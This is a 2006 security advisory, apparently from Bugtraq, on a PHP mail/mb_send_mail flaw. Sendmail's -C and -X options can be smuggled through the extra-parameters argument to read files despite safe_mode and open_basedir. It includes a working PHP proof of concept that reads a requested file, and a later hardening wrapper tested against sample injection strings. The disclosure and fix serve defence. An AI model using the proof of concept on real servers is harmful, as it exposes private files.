Network Security Bugtraq

(PHP) mb_send_mail security bypass

Subject: (PHP) mb_send_mail security bypass
Date: 28 Feb 2006 18:52:49 -0000
Vulnerable: PHP4, PHP5
with use of sendmail 8.13.4 ><

When safe_mode is disabled and an open_basedir restriction is in effect, we can pass extra parameters to the sendmail command in the mail function, especially the -C and -X arguments.
-C for an alternate configuration file
-X to log everything to a file
This can be used to view files: pass the file to view to the -C argument, and its content is stored in the file passed to the -X argument.

When safe_mode is enabled and an open_basedir restriction is in effect, we can pass extra parameters to the sendmail command in the mb_send_mail function.

Solution:
Use another sendmail command and don't allow extra parameters for mb_send_mail when safe_mode is enabled.

<?php
        if (isset($_REQUEST['file'])) {
                $file = "sendlog";
                if (file_exists($file)) unlink($file);
                $extra = "-C ".$_REQUEST['file']." -X ".getcwd()."/".$file;
                mb_send_mail(NULL, NULL, NULL, NULL, $extra);
                echo "<pre>".file_get_contents($file)."</pre>";
        }
?>

  • (PHP) mb_send_mail security bypass, ced . clerget <=
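On the application side, the advisory's "don't allow extra parameters" can be enforced by never forwarding request data as the fifth argument and building it from a validated envelope sender only. The following is an added example, not code from the advisory or from PHP itself; the helper names `build_sendmail_params` and `send_mail_hardened` and the sample inputs are hypothetical.

```php
<?php
// Added example: hypothetical helper names, not part of PHP or the advisory.

/**
 * Build the 5th argument for mail()/mb_send_mail() from a validated
 * envelope sender only. Nothing else is ever passed to sendmail.
 */
function build_sendmail_params(?string $envelopeSender): string
{
    if ($envelopeSender === null || $envelopeSender === '') {
        return '';                       // no extra parameters at all
    }
    // Strict shape: no whitespace, no quotes, no leading '-', so the value
    // cannot introduce a second option such as -C or -X.
    $strict = '/\A[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/';
    if (!preg_match($strict, $envelopeSender)
        || filter_var($envelopeSender, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('rejected envelope sender');
    }
    return '-f' . $envelopeSender;
}

// Wrapper: callers can supply a sender address, never raw sendmail options.
function send_mail_hardened(string $to, string $subject, string $body,
                            string $headers = '', ?string $sender = null): bool
{
    return mb_send_mail($to, $subject, $body, $headers,
                        build_sendmail_params($sender));
}

// Constructed inputs: the last two mimic the advisory's "-C ... -X ..." shape.
$samples = [
    'bounce@example.org',
    '-C /path/to/file -X /tmp/sendlog',
    'a@example.org -X/tmp/sendlog',
];
foreach ($samples as $s) {
    try {
        printf("%-34s => %s\n", $s, build_sendmail_params($s));
    } catch (InvalidArgumentException $e) {
        printf("%-34s => %s\n", $s, $e->getMessage());
    }
}
```

Only the first sample is accepted; the other two are rejected before any mail function is called.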